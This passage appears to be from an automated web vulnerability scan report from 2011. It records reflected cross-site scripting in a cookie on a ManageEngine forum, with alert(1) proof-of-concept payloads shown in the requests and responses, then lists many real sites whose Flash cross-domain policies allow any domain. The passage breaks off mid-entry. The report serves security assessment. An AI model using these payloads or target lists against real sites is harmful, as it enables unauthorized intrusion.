Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:30 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:30 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741410; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
ne:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_s_p81479006": '19ba92<script>alert(1)</script>e69fd29fdd1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&ini
...[SNIP]...

5.67. http://forums.manageengine.com/fbw [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.manageengine.com
Path:	/fbw

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22270"><script>alert(1)</script>5970609d8e4 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a22270"><script>alert(1)</script>5970609d8e4; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:12:05 GMT
Server: Apache-Coyote/1.1
Content-Length: 25959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<link href="//css.zohostat
...[SNIP]...
<input type="hidden" id="zdrpn" name="zdrpn" value="067f90c3-40d8-4a59-bdeb-52669063c03a22270"><script>alert(1)</script>5970609d8e4">
...[SNIP]...

5.68. http://forums.manageengine.com/fbw [zdccn cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums.manageengine.com
Path:	/fbw

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd770"-alert(1)-"80d1da2beeb was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03acd770"-alert(1)-"80d1da2beeb; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:12:06 GMT
Server: Apache-Coyote/1.1
Content-Length: 25914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

<link href="//css.zohostat
...[SNIP]...
<script>
//For I18N
var zuid = "-1";
var csrfParamName = "zdrpn";
var csrfToken = "067f90c3-40d8-4a59-bdeb-52669063c03acd770"-alert(1)-"80d1da2beeb";
var i18n = new Array();
i18n["zohodiscussions.settings.PleaseEnteravalue"]="The input field is empty!";
i18n["zohodiscussions.generalmessage.enteraValidemailaddre
...[SNIP]...

6. Flash cross-domain policy previous next
There are 49 instances of this issue:

http://195.68.160.134/crossdomain.xml
http://195.68.160.166/crossdomain.xml
http://195.68.160.167/crossdomain.xml
http://195.68.160.40/crossdomain.xml
http://195.68.160.95/crossdomain.xml
http://ad.afy11.net/crossdomain.xml
http://ad.doubleclick.net/crossdomain.xml
http://api.facebook.com/crossdomain.xml
http://b.voicefive.com/crossdomain.xml
http://beacon.securestudies.com/crossdomain.xml
http://bs.mail.ru/crossdomain.xml
http://bs.yandex.ru/crossdomain.xml
http://cdn-01.yumenetworks.com/crossdomain.xml
http://counter.rambler.ru/crossdomain.xml
http://d7.zedo.com/crossdomain.xml
http://event.adxpose.com/crossdomain.xml
http://games.mochiads.com/crossdomain.xml
http://goods.adnectar.com/crossdomain.xml
http://goods43.adnectar.com/crossdomain.xml
http://img.en25.com/crossdomain.xml
http://learn.shavlik.com/crossdomain.xml
http://m.adnxs.com/crossdomain.xml
http://map.media6degrees.com/crossdomain.xml
http://mbox5.offermatica.com/crossdomain.xml
http://pda.loveplanet.ru/crossdomain.xml
http://pixel.fetchback.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://pl.yumenetworks.com/crossdomain.xml
http://playspal.com/crossdomain.xml
http://pretty.ru/crossdomain.xml
http://r2.mail.ru/crossdomain.xml
http://rbcgaru.hit.gemius.pl/crossdomain.xml
http://rs.mail.ru/crossdomain.xml
http://s0.2mdn.net/crossdomain.xml
http://search.twitter.com/crossdomain.xml
http://widgets.fotocash.ru/crossdomain.xml
http://gomail.radar.imgsmail.ru/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://imagesrv.gartner.com/crossdomain.xml
http://img.dt00.net/crossdomain.xml
http://img.imgsmail.ru/crossdomain.xml
http://img.mail.ru/crossdomain.xml
http://js.dt00.net/crossdomain.xml
http://mail.radar.imgsmail.ru/crossdomain.xml
http://mail.ru/crossdomain.xml
http://odnoklassniki.ru/crossdomain.xml
http://oth.dt00.net/crossdomain.xml
http://www.gartner.com/crossdomain.xml
http://www.livejournal.com/crossdomain.xml

6.1. http://195.68.160.134/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.134
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.134

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:37 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 07 Nov 2008 04:42:33 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:37 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.2. http://195.68.160.166/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.166
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.166

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:26:43 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:26:43 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.3. http://195.68.160.167/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.167
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.167

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:38 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:55 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:38 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.4. http://195.68.160.40/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.40
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.40

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:57 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:57 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.5. http://195.68.160.95/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://195.68.160.95
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.95

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:41 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:41 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.6. http://ad.afy11.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:37:55 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.7. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.8. http://api.facebook.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Wed, 25 May 2011 15:17:38 GMT
X-FB-Server: 10.32.72.125
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

6.9. http://b.voicefive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.10. http://beacon.securestudies.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://beacon.securestudies.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.11. http://bs.mail.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.mail.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.mail.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:29:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 15:29:05 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.12. http://bs.yandex.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.yandex.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.yandex.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:37 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 15:30:37 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.13. http://cdn-01.yumenetworks.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn-01.yumenetworks.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn-01.yumenetworks.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2
ETag: "182c001-122-454adb8106440"
Accept-Ranges: bytes
Content-Type: application/xml
Age: 121191
Date: Mon, 25 Apr 2011 14:54:12 GMT
Last-Modified: Sun, 17 Aug 2008 20:30:01 GMT
Content-Length: 290
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...

6.14. http://counter.rambler.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://counter.rambler.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: counter.rambler.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:27:04 GMT
Expires: Mon, 25 Apr 2011 14:37:04 GMT
Content-type: text/plain
Content-length: 288
Last-Modified: Mon, 14 Feb 2011 12:33:32 GMT

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" secure="true" />
<allow-ht
...[SNIP]...

6.15. http://d7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
X-Varnish: 619922229
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=931
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.16. http://event.adxpose.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://event.adxpose.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1302122676000"
Last-Modified: Wed, 06 Apr 2011 20:44:36 GMT
Content-Type: application/xml
Content-Length: 203
Date: Mon, 25 Apr 2011 14:23:41 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

6.17. http://games.mochiads.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://games.mochiads.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: games.mochiads.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/xml
Content-Length: 213
Last-Modified: Thu, 21 Oct 2010 04:46:54 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.47:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.105:40049
X-Mochi-Source: 10.0.0.238:27050
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80" />
</cross-do
...[SNIP]...

6.18. http://goods.adnectar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://goods.adnectar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: goods.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:25 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hYFNKXjmCLwgAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.19. http://goods43.adnectar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://goods43.adnectar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: goods43.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:31:29 GMT
Content-Type: text/xml
Content-Length: 326
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hcFNKXjmCL4qAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.20. http://img.en25.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.en25.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.en25.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 206
Cache-Control: max-age=0
Date: Mon, 25 Apr 2011 14:54:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

6.21. http://learn.shavlik.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: learn.shavlik.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/xml
Content-Location: http://learn.shavlik.com/crossdomain.xml
Last-Modified: Sun, 23 Aug 2009 19:48:53 GMT
Accept-Ranges: bytes
ETag: "4e3f9ebe2a24ca1:1772"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 12:16:43 GMT
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. http://m.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: m.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:37:37 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.23. http://map.media6degrees.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://map.media6degrees.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Mon, 25 Apr 2011 14:37:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.24. http://mbox5.offermatica.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mbox5.offermatica.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox5.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"201-1302288767000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 25 Apr 2011 15:13:56 GMT
Connection: close
Last-Modified: Fri, 08 Apr 2011 18:52:47 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.25. http://pda.loveplanet.ru/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pda.loveplanet.ru
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pda.loveplanet.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:45 GMT
Content-Type: text/xml; charset=UTF-8
Content-Length: 145
Last-Modified: Wed, 13 Apr 2011 14:01:14 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.26. http://pixel.fetchback.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.fetchback.com

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:13:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

6.27. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
